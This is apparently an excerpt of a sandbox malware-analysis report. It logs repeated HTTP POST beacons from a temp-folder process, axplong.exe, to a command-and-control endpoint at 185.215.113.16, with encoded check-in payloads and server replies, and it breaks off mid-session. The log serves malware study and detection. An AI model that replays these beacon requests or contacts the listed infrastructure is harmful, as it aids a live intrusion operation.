                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:09.088984966 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:09.862994909 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:09 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:09.864087105 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:10.143987894 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:10 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    31 | 192.168.2.7 | 49736 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:10.327955961 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:11.032474041 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:10 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:11.062325954 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:11.317271948 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:11 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    32 | 192.168.2.7 | 49737 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:11.430704117 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:12.172636986 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:12 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:12.173414946 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:12.419078112 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:12 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    33 | 192.168.2.7 | 49738 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:12.540992975 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:13.309009075 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:13 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:13.309773922 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:13.559909105 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:13 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    34 | 192.168.2.7 | 49739 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:13.681185007 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:14.420831919 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:14 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:14.421703100 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:14.675081015 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:14 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    35 | 192.168.2.7 | 49740 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:14.790150881 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:15.583616972 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:15 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:15.584462881 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:15.837414980 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:15 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    36 | 192.168.2.7 | 49741 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:15.961630106 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:16.775984049 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:16 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:16.776843071 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:17.036341906 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:16 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    37 | 192.168.2.7 | 49742 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:17.178580046 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:17.936431885 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:17 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:17.981154919 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:18.231288910 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:18 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    38 | 192.168.2.7 | 49743 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:18.484337091 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:19.281801939 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:19 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:19.282558918 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:19.533179998 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:19 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    39 | 192.168.2.7 | 49744 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:19.649820089 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:20.415177107 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:20 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:20.415987968 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:20.669310093 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:20 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    40 | 192.168.2.7 | 49745 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:20.790211916 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:21.527471066 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:21 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:21.626467943 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:21.873404026 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:21 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    41 | 192.168.2.7 | 49746 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:21.993262053 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:22.774437904 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:22 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:22.777517080 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:23.039597988 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:22 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    42 | 192.168.2.7 | 49747 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:23.152340889 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:23.928320885 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:23 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:23.929080009 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:24.176000118 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:24 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    43 | 192.168.2.7 | 49748 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:24.290128946 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:25.029486895 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:24 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
